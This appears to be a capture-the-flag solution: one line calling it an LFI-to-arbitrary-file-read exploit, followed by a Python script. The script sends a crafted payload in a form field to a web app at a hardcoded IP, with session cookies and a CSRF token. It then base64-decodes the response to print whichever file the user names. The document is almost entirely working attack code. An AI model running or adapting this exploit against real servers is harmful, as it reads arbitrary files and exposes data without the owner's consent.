Exploit LFI to arbitary file read.

```python  
import requests  
from bs4 import BeautifulSoup  
from base64 import b64decode  
import random  
import string

headers = {  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0)
Gecko/20100101 Firefox/91.0',  
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'en-GB,en;q=0.5',  
'Referer': 'http://193.57.159.27:26683/new/',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://193.57.159.27:26683',  
'Connection': 'keep-alive',  
'Upgrade-Insecure-Requests': '1',  
'Pragma': 'no-cache',  
'Cache-Control': 'no-cache',  
}  
cookie = {  
"csrftoken":"WpkSPU3EitDvJgR6O8SOeaNACQLMLmNPDecOYKdrpUnG5yQFa45lHEDpqFFoEvHN",  
"sessionid":
".eJxNjEsKwjAURQVxKIKr0EnoS9qXZCbOXUN5aRLbKg30MxRcQIZxIe5QRYXe4TmHe189novvbmkX1yVNY11Og-
vLxqa4BMAUtzNqqLq47q32tqXuHFgVurFvDPsk7GcHdgrWXY__djM7qGmoUzwgFCAxz4i85iI3ymSCo3fca22l8KC1stIgeo-
ggVdYAHGnpORCgcnTxF4l3D6b:1mFhwu:mlibTmM3JvM87A1WTadKyJVBiuYRJJUgj6h-HKyYfRM"

}

def send_request(payload):  
data = {  
"csrfmiddlewaretoken":"J0krStVNFuVQo6cpg2JpH5RFWeD69XBwqPcn1j5AMVF1KobYCYWWazHuK3xI26vu",  
"name":"test15",  
"body":"({}}{%s}..})" % payload  
}  
response = requests.post("http://193.57.159.27:45262/new/", headers=headers,
data=data, cookies=cookie)  
soup = BeautifulSoup(response.text, "html.parser")  
paragraph = soup.find('p', class_='card-text')  
base64_data = paragraph.img['src'].replace("data:image/png;base64,", "")  
print(b64decode(base64_data).decode("UTF-8"))

if __name__ == "__main__":  
payload = input("File to read: ").strip()  
send_request(payload)  
```